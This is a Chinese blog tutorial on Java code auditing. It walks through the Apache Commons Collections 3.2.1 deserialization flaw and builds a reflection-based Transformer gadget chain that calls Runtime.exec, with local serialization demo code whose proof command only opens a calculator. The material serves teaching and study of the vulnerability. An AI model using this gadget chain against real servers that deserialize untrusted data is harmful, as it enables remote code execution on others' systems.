2021-05-12

于 2021-05-12 14:36:33 发布
阅读量128 收藏
点赞数
分类专栏: 代码审计 Web安全 文章标签: 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hyj123480/article/details/116707385
版权

Java代码审计系列第二课 案例Apache Commons Collections反序列化漏洞讲解

简述

Apache Commons CollectionsApache Commons的组件,它们是从Java API派生而来的,并为Java语言提供了组件体系结构。 Commons-Collections试图通过提供新的接口,实现和实用程序来构建JDK类。

Apache Commons包应该是Java中使用最广发的工具包,很多框架都依赖于这组工具包中的一部分,它提供了我们常用的一些编程需要,但是JDK没能提供的机能,最大化的减少重复代码的编写。

2015年11月6日FoxGlove Security安全团队的@breenmachine发布了一篇长博客,阐述了利用Java反序列化和Apache Commons Collections这一基础类库实现远程命令执行的真实案例,各大Java Web Server纷纷躺枪,这个漏洞横扫WebLogic、WebSphere、JBoss、Jenkins、OpenNMS的最新版。

要了解这一节课的知识需要提前学习我们第一节课的反射知识 Java代码审计系列第一课 反射机制

搭建环境

Apache Commons Collections 官方在漏洞第一时间就已经修补了漏洞,所以有漏洞的版本是>=3.2.1的,配置好maven,就会自动下载下来。

<!-- https://mvnrepository.com/artifact/commons-collections/commons-collections -->
<dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.2.1</version>
</dependency>

打开依赖包,看到 /org/apache/commons/collections/functors/InvokerTransformer.class

打开这个文件。

漏洞分析

漏洞成因

上节课我们说过,java的反射可以动态的调用类和类里面的方法,用就是类似如下代码

 Class class1 = Class.forName(req.getParameter("className"));
 class1.getMethod(req.getParameter("methodName")).invoke(class1.newInstance());

InvokerTransformer.class 中的第54行的transform方法

可以看到transform方法利用Java的反射机制进行任意方法调用。input参数是传入的一个实例化对象,反射调用的是其方法。 就很直接的调用了Java中的反射机制去实例化对象!

 Class cls = input.getClass();
 Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
 return method.invoke(input, this.iArgs);

不过值得注意的是,仅仅是这里是不能够命令执行的,因为Java不像PHP那样是面向过程的编程,不能直接执行类似system, shell_exec 之类的函数,Java是一门面向对象的语言,所谓万物皆对象,没有对象new一个。执行操作的时候,需要对象->方法

或者类->静态方法, 最常用的就是 java.lang.Runtime.getRuntime().exec(cmd),因此,光凭这个反射还是不能造成命令执行漏洞的,需要调用到transform 这个方法,并且将调用的结果作为下一次的输入。

找调用链

所以,我们得继续翻这个包,看看有没有满足我们条件的方法。直到找到/org/apache/commons/collections/functors/ChainedTransformer.class 这个文件


public class ChainedTransformer implements Transformer, Serializable {
    private static final long serialVersionUID = 3514945074733160196L;
    private final Transformer[] iTransformers; 

	 // .... 其他不重要的代码省略

    public Object transform(Object object) {
        for(int i = 0; i < this.iTransformers.length; ++i) {
            object = this.iTransformers[i].transform(object);
        }
        return object;
    }
}

可以看到这里的transform 实现了Transformer这个接口,重写了transform方法,并在里面遍历所有重写Transformer接口的对象,

调用其的transform方法然后返回个object,返回的object继续进入循环,成为下一次调用的参数,那我们怎么通过这里来执行命令呢?

构造Payload

结合InvokerTransformer可以构造出:

package com.evalshell.main;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;

public class HelloController {
    public static void main(String[] args) {
        Transformer[] transformers = new Transformer[]{
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"open -a Calculator"})};
        Transformer transformerChain = new ChainedTransformer(transformers);
        transformerChain.transform(Runtime.getRuntime()); 
    }
}

这里的Runtime.getRuntime() 会带入到InvokerTransformer 中的transform, 此时里面cls就是Runtime.getRuntime(), cls.getMethod(this.iMethodName, this.iParamTypes); 所以第一个参数就应当为getMethod;而getMethod方法的签名为getMethod(String, Class...),我们实际用的时候也只传入了一个String,所以第二个参数应当写为new Class[] {String.class, Class[].class},第三个参数则为调用getMethod时候实际传入的参数,所以应当为new Object[] {"getRuntime", new Class[0]}就可以了。这个this.iMethodName 就是我们传进去的参数exec, 后面就是我们穿的String类型的数组"open -a Calculator",这样一条完整的利用链就完成了。

但是这里实例化后的对象Runtime不允许序列化,所以不能直接传入实例化的对象。所以我们需要在transforms中利用InvokerTransformer反射回调出Runtime.getRuntime()

Transformer[] transformers = new Transformer[] {
            //传入Runtime类
            new ConstantTransformer(Runtime.class),
            //反射调用getMethod方法,然后getMethod方法再反射调用getRuntime方法,返回Runtime.getRuntime()方法
            new InvokerTransformer("getMethod",
                    new Class[] {String.class, Class[].class },
                    new Object[] {"getRuntime", new Class[0] }),
            //反射调用invoke方法,然后反射执行Runtime.getRuntime()方法,返回Runtime实例化对象
            new InvokerTransformer("invoke",
                    new Class[] {Object.class, Object[].class },
                    new Object[] {null, new Object[0] }),
            //反射调用exec方法
            new InvokerTransformer("exec",
                    new Class[] {String.class },
                    new Object[] {"open -a Calculator"})
    };
Transformer transformerChain = new ChainedTransformer(transformers);

整个调用链是((Runtime) Runtime.class.getMethod("getRuntime").invoke()).exec("open -a Calculator")
现在反序列化后就可以obj.transform("随意输入");这样触发命令执行,但是一般也没有这样的代码,我们还需要继续构造。

反序列化利用

到目前为止,我们已经构造出了可以执行命令的恶意chain,姑且称之为基于Poc的验证利用链。现在只要找到一个符合以下条件的类,满足以下条件,并且服务端有反序列化的入口,就可以RCE了:

  1. 该类重写了readObject方法;

  2. 该类在readObject方法中操作了我们序列化后实现了pocChainTransformedMap

这样的操作,我们可以在/org/apache/commons/collections/functors/ConstantTransformer.class找到

因为在ConstantTransformer中,调用transform方法时不管输入什么都不会影响返回,所以,随意输入即可。

那么能否直接这样构造进行序列化呢,编写代码试试, 编写一个序列化的demo

package com.evalshell.main;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;

import java.io.*;

public class HelloController {
    public static void main(String[] args) {

        Transformer[] transformers = {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{ String.class, Class[].class}, new Object[]{"getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[]{ Object.class, Object[].class}, new Object[]{ null ,new Object[0]} ),
                new InvokerTransformer("exec",
                        new Class[] {String.class },
                        new Object[] {"open -a Calculator"})
        };
        Transformer transformerChain = new PocTransformer(transformers);

      
      	//序列化对象
        try{
            File f  = new File("f_u_c_k_object");
            ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream(f));
            outputStream.writeObject(transformerChain);
            outputStream.flush();
            outputStream.close();
        }catch (IOException exception){
            exception.printStackTrace();
        }
				//反序列化对象
        try {
            File f = new File("f_u_c_k_object");
            ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(f));
            Transformer f_u_c_k_object = (Transformer) objectInputStream.readObject();
            f_u_c_k_object.transform("fenguxan"); //这里可以填写任意值
            System.out.println(f_u_c_k_object.getClass());
        }catch (FileNotFoundException exception){
            exception.printStackTrace();
        }catch (ClassNotFoundException exception){
            exception.printStackTrace();
        }catch (IOException exception){
            exception.printStackTrace();
        }


    }
}

class PocTransformer implements Transformer, Serializable{
    private final Transformer[] iTransformers;

    PocTransformer(Transformer[] iTransformers) {
        this.iTransformers = iTransformers;
    }


    @Override
    public Object transform(Object object) {
        for(int i = 0; i < this.iTransformers.length; ++i) {
            System.out.println(object.getClass());
            object = this.iTransformers[i].transform(object);
        }

        return object;
    }
}

后续的攻击链就不是我们本节课的重点了,大家可以自己去看下参考链接

参考

https://xz.aliyun.com/t/4558#toc-0
https://www.anquanke.com/post/id/82934
https://p0sec.net/index.php/archives/121/
https://security.tencent.com/index.php/blog/msg/97

风炫安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[红日安全]Web安全Day11 – 敏感信息泄露实战
hongrisec的博客
03-06 802
本文由红日安全成员: 爱夕 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Python靶场基...
风炫安全Web安全学习第四十节课 反序列化漏洞攻击利用演示
风炫的博客
01-06 360
风炫安全Web安全学习第四十节课 反序列化漏洞攻击利用演示 0x02 反序列化漏洞利用 反序列化漏洞的成因在于代码中的 unserialize() 接收的参数可控,从上面的例子看,这个函数的参数是一个序列化的对象,而序列化的对象只含有对象的属性,那我们就要利用对对象属性的篡改实现最终的攻击。 01对象注入 当用户的请求在传给反序列化函数unserialize()之前没有被正确的过滤时就会产生漏洞。因为PHP允许对象序列化,攻击者就可以提交特定的序列化的字符串给一个具有该漏洞的unserialize函数,最终
风炫安全之CobaltStrike系列视频教程(一)
风炫的博客
12-12 376
风炫安全之CobaltStrike系列视频教程 风炫安全之CobaltStrike系列视频教程 个人介绍 主攻方向:Web安全、网络安全、安全开发。 ID:风炫 Github地址: https://github.com/fengxuangit 教程只是为了提供学习和研究,所有技术切勿用于非法用途! Cobalt Strike 介绍 Cobalt Strike是一款渗透测试神器,常被业界人
django haystack深入研究
风炫的博客
11-23 630
django haystack深入研究 前言 evalshell.com风炫安全 是我自己开发的一个搜集全网安全领域知识库的一个垂直领域的网站,对于一个垂直搜索网站,我深知搜索准确度和速度的重要,所以经过一番调研之后我选择了haystack这个全文搜索扩展库。 但是我有着自定义的需求,所以对haystack进行了源码分析定制。 软件简介 Haystack 是 Django 框架的搜索扩展模块。Haystack 提供统一的 API 允许你使用不同的搜索后端,包括Solr,Elasticse...
风炫安全Web安全学习第二节课 HTML基础
风炫的博客
12-16 106
学习地址:HTML基础 html基础 html表单 html常用标签 前端攻防中常用的一些手法 反射性XSS Dom-based型XSS 存储型XSS 学习的网站:https://www.w3school.com.cn/html/index.asp
2021-05-11
march20110303的博客
05-11 295
给大家提供一个python程序,是迷你世界的仿真版。 """ from zifan.site version 1.1.0 python 3.x """ import sys import random import time from collections import deque from pyglet import image from pyglet.gl import * from pyglet.graphics import TextureGroup from pyglet.window im
2021-05《升维阅读》.pdf
07-23
2021-05《升维阅读》
APToolV7200(2021-02-01)
12-13
APTool-UMPTooV7200 是一款专门用于量产chipsbank主控U盘的工具。这款工具的主要功能是对U盘进行量产操作,也就是通过制作U盘固件,将U盘的物理存储芯片的空间划分为分区,赋予U盘可读写和存储的功能。...
GameFramework-2021-05-31
最新发布
05-22
GameFramework_2021_05_31.unitypackage是该框架的一个版本打包文件,包含了上述所有系统的源代码和配置文件,开发者可以通过导入此包到Unity工程中,快速开始游戏开发。值得注意的是,这个版本可能已经过时,开发者...
gmall2020-mock-db-2021-11-14.jar
06-26
gmall2020-mock-db-2021-11-14.jar
UL 1479 2021-05.pdf
02-16
UL 1479 2021-05.pdf
UL 1434 2021-05.pdf
02-16
UL 1434 2021-05.pdf
FiddlerSetup2021-05.zip
05-07
1. 下载:从官方渠道或通过"FiddlerSetup2021-05.zip"压缩包获取FiddlerSetup.exe安装文件。 2. 解压:解压缩"FiddlerSetup2021-05.zip",得到FiddlerSetup.exe。 3. 安装:双击运行FiddlerSetup.exe,按照向导指引...
CPU benmarks 2021-05-25.xlsx
05-25
截至2021-05-25为止,x86 CPU 性能排序数据,Excel表格格式。数据完整,统计了3000个CPU型号。数据为自行录入并排版。
风炫安全Web安全学习第三节课 前端XSS攻击
风炫的博客
12-20 127
风炫安全Web安全学习第三节课 前端XSS攻击
风炫安全Web安全学习第四十一节课 XXE漏洞演示与讲解
风炫的博客
01-07 222
风炫安全Web安全学习第四十一节课 XXE漏洞演示与讲解 XXE漏洞 0x01 基础知识 XML是一种非常流行的标记语言,在1990年代后期首次标准化,并被无数的软件项目所采用。它用于配置文件,文档格式(如OOXML,ODF,PDF,RSS,…),图像格式(SVG,EXIF标题)和网络协议(WebDAV,CalDAV,XMLRPC,SOAP,XMPP,SAML, XACML,…),他应用的如此的普遍以至于他出现的任何问题都会带来灾难性的结果。 <?xml version="1.0"?> <
风炫安全WEB安全学习第四十九节课 靶场的搭建与实战
风炫的博客
02-09 1069
靶场实战 自《网络安全法》实施以后,在互联网上未经授权的渗透测试是违法行为。缺少了实战的战场,我们现在一般用靶场来进行实战的渗透测试学习,因为这样不会影响别人网站服务的正常运行,不会影响到别人的业务。 我在这里推荐几个靶场,然后可以对靶场里面的漏洞进行针对化学习并实战。 线上靶场推荐 https://hack.zkaq.cn/ 封神台,掌控安全的线上靶场 https://www.ichunqiu.com/ I春秋,很早就出来的一个综合的靶场。 https://redtiger.labs.overthewir
CPU benmarks 2021-05-25.pdf
05-25
截至2021-05-25为止,x86 CPU 性能排序数据,PDF格式。数据完整,统计了3000个CPU型号。数据为自行录入并排版。
{ "pageIndex": 1, "pageSize": 20, "search": { "kssj": "2021-01-12 12:00:00", "jssj": "2021-05-12 23:49:05" } }代码编写
11-21
string jssj = "2021-05-12 23:49:05"; var search = new { kssj = kssj, jssj = jssj }; var data = new { pageIndex = pageIndex, pageSize = pageSize, search = search }; string json = JsonConvert....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值